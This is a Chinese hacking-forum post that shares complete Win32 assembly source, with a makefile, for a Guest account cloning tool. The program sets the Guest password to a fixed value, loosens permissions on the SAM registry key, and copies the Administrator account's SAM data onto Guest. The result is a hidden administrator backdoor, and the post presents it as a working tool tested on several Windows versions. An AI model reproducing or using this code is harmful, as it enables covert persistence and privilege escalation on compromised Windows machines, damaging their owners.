[原创]Win32汇编版 Guest 帐号克隆工具
文章作者:taiwansee信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
刚学WIN32汇编不久。。写了个把guest克隆成1f4帐号的小程序。。
在2000/xp/2003/2008 RC0 上测试成功。。
现开放源代码,发现bug请跟贴。。
[b][color=#FF0000]注意:本文中的代码只做技术学习讨论,不可用作非法用途。[/color][/b]
[language=asm]
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Win32汇编版 Guest帐号克隆工具
;
; By taiwansee 2007-11-10
;
; 使用 nmake 或下列命令进行编译和链接:
; ml /c /coff Clone.asm
; Link /subsystem:windows Clone.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
include netapi32.inc
includelib netapi32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.const
DEBUG equ 0
HKLM equ HKEY_LOCAL_MACHINE
if DEBUG
NERR_SUCCESS equ 0
endif
.data?
stExplicitAccess EXPLICIT_ACCESS <>
stUserInfo USER_INFO_1003 <>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
if DEBUG
szCaption db 'Debug info......',0
szFailed db 'Open Subkey Failed!!!',0
szSuccess db 'Open Subkey Success!!!',0
szCloseSuccess db 'Close Subkey Success!!!',0
szCloseFailed db 'Close Subkey Failed!!!',0
szQueryValueSuccess db 'Query Value Success!!!',0
szQueryValueFailed db 'Query Value Failed!!!',0
szSetValueSuccess db 'Set Value Success!!!',0
szSetValueFailed db 'Set Value Failed!!!',0
szGetNamedSecurityInfoSuccess db 'Get Named Security Info Success!!!',0
szGetNamedSecurityInfoFailed db 'Get Named Security Info Failed!!!',0
szSetEntriesInAclSuccess db 'Set Entries In Acl Success!!!',0
szSetEntriesInAclFailed db 'Set Entries In Acl Failed!!!',0
szSetNamedSecurityInfoSuccess db 'Set Named Security Info Success!!!',0
szSetNamedSecurityInfoFailed db 'Set Named Security Info Failed!!!',0
szLocalFreeFailed1 db 'Local Free @lpSecurityDescriptor Failed!!!',0
szLocalFreeFailed2 db 'Local Free @lpOldDACL Failed!!!',0
szLocalFreeFailed3 db 'Local Free @lpNewDACL Failed!!!',0
szNetUserSetInfoSuccess db 'Net User Set Info Success!!!',0
szERROR_ACCESS_DENIED db 'szERROR_ACCESS_DENIED',0
szNERR_InvalidComputer db 'szNERR_InvalidComputer',0
szNERR_NotPrimary db 'szNERR_NotPrimary',0
szNERR_UserNotFound db 'szNERR_UserNotFound',0
szNERR_PasswordTooShort db 'szNERR_PasswordTooShort',0
szNetUserChangePasswordSuccess db 'szNetUserChangePasswordSuccess',0
szNetUserChangePasswordOtherError db 'szNetUserChangePasswordOtherError',0
szNERR_LastAdmin db 'szNERR_LastAdmin',0
szNERR_BadPassword db 'szNERR_BadPassword',0
szNERR_SpeGroupOp db 'szNERR_SpeGroupOp',0
szBuffer db 2048 dup(0)
szFormat db '%d',0
endif
szValueName db 'F',0
szObject db 'MACHINE\SAM\SAM',0
szAccessUser db 'Everyone',0
szSystemUser db 'System',0
szSubKey1 db 'SAM\SAM\Domains\Account\Users\000001F4',0
szSubKey2 db 'SAM\SAM\Domains\Account\Users\000001F5',0
szUserPassword dw 'E','v','i','l','o','c','t','a','l','2','0','0','7',00
szAccountName dw 'g','u','e','s','t',00
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
_SetAccountPassword proc
local @lpError:dword
local @lpNULL:dword
mov stUserInfo.usri1003_password,offset szUserPassword
invoke NetUserSetInfo,NULL,\
offset szAccountName,\
1003,\
offset stUserInfo,\
NULL
if DEBUG
.if eax==ERROR_ACCESS_DENIED
invoke MessageBox,NULL,offset szERROR_ACCESS_DENIED,offset szCaption,MB_OK
.elseif eax==NERR_InvalidComputer
invoke MessageBox,NULL,offset szNERR_InvalidComputer,offset szCaption,MB_OK
.elseif eax==NERR_NotPrimary
invoke MessageBox,NULL,offset szNERR_NotPrimary,offset szCaption,MB_OK
.elseif eax==NERR_UserNotFound
invoke MessageBox,NULL,offset szNERR_UserNotFound,offset szCaption,MB_OK
.elseif eax==NERR_PasswordTooShort
invoke MessageBox,NULL,offset szNERR_PasswordTooShort,offset szCaption,MB_OK
.elseif eax==NERR_SpeGroupOp
invoke MessageBox,NULL,offset szNERR_SpeGroupOp,offset szCaption,MB_OK
.elseif eax==NERR_BadPassword
invoke MessageBox,NULL,offset szNERR_BadPassword,offset szCaption,MB_OK
.elseif eax==NERR_LastAdmin
invoke MessageBox,NULL,offset szNERR_LastAdmin,offset szCaption,MB_OK
.elseif eax==NERR_SUCCESS
invoke MessageBox,NULL,offset szNetUserChangePasswordSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szNetUserChangePasswordOtherError,offset szCaption,MB_OK
.endif
endif
ret
_SetAccountPassword endp
_Clone proc
local @hSubkey1:dword,\
@hSubkey2:dword,\
@szBuffer[4096]:byte,\
@szDataType:dword,\
@szDataBuffer[4096]:byte,\
@szDataBufferSize:dword,\
@lpOldDACL:dword,\
@lpNewDACL:dword,\
@lpSecurityDescriptor:dword
pushad
;首先获取SAM主键的DACL
invoke GetNamedSecurityInfo,offset szObject,\
SE_REGISTRY_KEY,\
DACL_SECURITY_INFORMATION,\
NULL,\
NULL,\
addr @lpOldDACL,\
NULL,\
addr @lpSecurityDescriptor
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szGetNamedSecurityInfoSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szGetNamedSecurityInfoFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;清空EXPLICIT_ACCESS结构
invoke RtlZeroMemory,offset stExplicitAccess,sizeof stExplicitAccess
;创建一个ACE,允许Everyone完全控制对象,并允许子对象继承此权限
mov esi,offset stExplicitAccess
assume esi:ptr EXPLICIT_ACCESS
mov [esi].grfAccessPermissions,KEY_ALL_ACCESS
mov [esi].grfAccessMode,SET_ACCESS
mov [esi].grfInheritance,SUB_CONTAINERS_AND_OBJECTS_INHERIT;允许子对象继承此权限
mov [esi].Trustee.pMultipleTrustee,NULL
mov [esi].Trustee.MultipleTrusteeOperation,NO_MULTIPLE_TRUSTEE
mov [esi].Trustee.TrusteeForm,TRUSTEE_IS_NAME
mov [esi].Trustee.TrusteeType,TRUSTEE_IS_GROUP
mov [esi].Trustee.ptstrName,offset szAccessUser
;将新的ACE加入DACL
invoke SetEntriesInAcl,1,\
offset stExplicitAccess,\
@lpOldDACL,\
addr @lpNewDACL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetEntriesInAclSuccess,offset szCaption,MB_OK
.else
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
invoke MessageBox,NULL,offset szSetEntriesInAclFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;更新SAM主键的DACL
invoke SetNamedSecurityInfo,offset szObject,\
SE_REGISTRY_KEY,\
DACL_SECURITY_INFORMATION,\
NULL,\
NULL,\
@lpNewDACL,\
NULL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetNamedSecurityInfoSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szSetNamedSecurityInfoFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
mov @szDataBufferSize,sizeof @szDataBuffer
;打开目标子键1
invoke RegOpenKeyEx,HKLM,offset szSubKey1,\
0,\
KEY_ALL_ACCESS,\
addr @hSubkey1
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;打开目标子键2
invoke RegOpenKeyEx,HKLM,offset szSubKey2,\
0,\
KEY_ALL_ACCESS,\
addr @hSubkey2
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;查询目标键值1
invoke RegQueryValueEx,@hSubkey1,\
offset szValueName,\
0,\
addr @szDataType,\
addr @szDataBuffer,\
addr @szDataBufferSize
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szQueryValueSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szQueryValueFailed,offset szCaption,MB_OK
jmp @F
.endif
invoke wsprintf,addr @szBuffer,offset szFormat,@szDataBufferSize
invoke MessageBox,NULL,addr @szBuffer,offset szCaption,MB_OK
endif
;设置目标键值2
invoke RegSetValueEx,@hSubkey2,\
offset szValueName,\
0,\
REG_BINARY,\
addr @szDataBuffer,\
@szDataBufferSize
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetValueSuccess,offset szCaption,MB_OK
.else
push eax
invoke MessageBox,NULL,offset szSetValueFailed,offset szCaption,MB_OK
pop eax
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
jmp @F
.endif
endif
invoke RegCloseKey,@hSubkey1
invoke RegCloseKey,@hSubkey2
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szCloseSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szCloseFailed,offset szCaption,MB_OK
.endif
endif
;恢复原来的DACL,只要修改下用户组即可
mov [esi].Trustee.ptstrName,offset szSystemUser
assume esi:nothing
;将新的ACE加入DACL
invoke SetEntriesInAcl,1,\
offset stExplicitAccess,\
NULL,\
addr @lpOldDACL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetEntriesInAclSuccess,offset szCaption,MB_OK
.else
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
invoke MessageBox,NULL,offset szSetEntriesInAclFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
invoke SetNamedSecurityInfo,offset szObject,\
SE_REGISTRY_KEY,\
DACL_SECURITY_INFORMATION,\
NULL,\
NULL,\
@lpOldDACL,\
NULL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetNamedSecurityInfoSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szSetNamedSecurityInfoFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
@@:
invoke LocalFree,@lpSecurityDescriptor
if DEBUG
.if eax!=0
invoke MessageBox,NULL,offset szLocalFreeFailed1,offset szCaption,MB_OK
.endif
endif
invoke LocalFree,@lpOldDACL
if DEBUG
.if eax!=0
invoke MessageBox,NULL,offset szLocalFreeFailed2,offset szCaption,MB_OK
.endif
endif
invoke LocalFree,@lpNewDACL
if DEBUG
.if eax!=0
invoke MessageBox,NULL,offset szLocalFreeFailed3,offset szCaption,MB_OK
.endif
endif
popad
ret
_Clone endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
call _SetAccountPassword
call _Clone
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
[/language]
makefile文件
[code]
NAME = Clone
OBJS = $(NAME).obj
LINK_FLAG = /subsystem:windows
ML_FLAG = /c /coff
$(NAME).exe: $(OBJS)
Link $(LINK_FLAG) $(OBJS)
.asm.obj:
ml $(ML_FLAG) $<
clean:
del *.obj
del *.exe
del *.res
del *.bak
[/code] 谢谢LZ的共享精神哦,不过你的代码在编译的时候会有很多错误。LZ最好是在把代码贴出来的同时,把原代码打包一下以附件的形式一起发上来。因为从网页上复制粘贴的代码会有莫名其妙的错误哦 感谢1楼mika 的提醒!
现把源代码、makefile文件、编译好的程序、windows.inc文件一起打包附上。
编译的时候请先备份自己的 masm32\include\windows.inc文件,然后用附件中的windows.inc替换之。
页:
[1]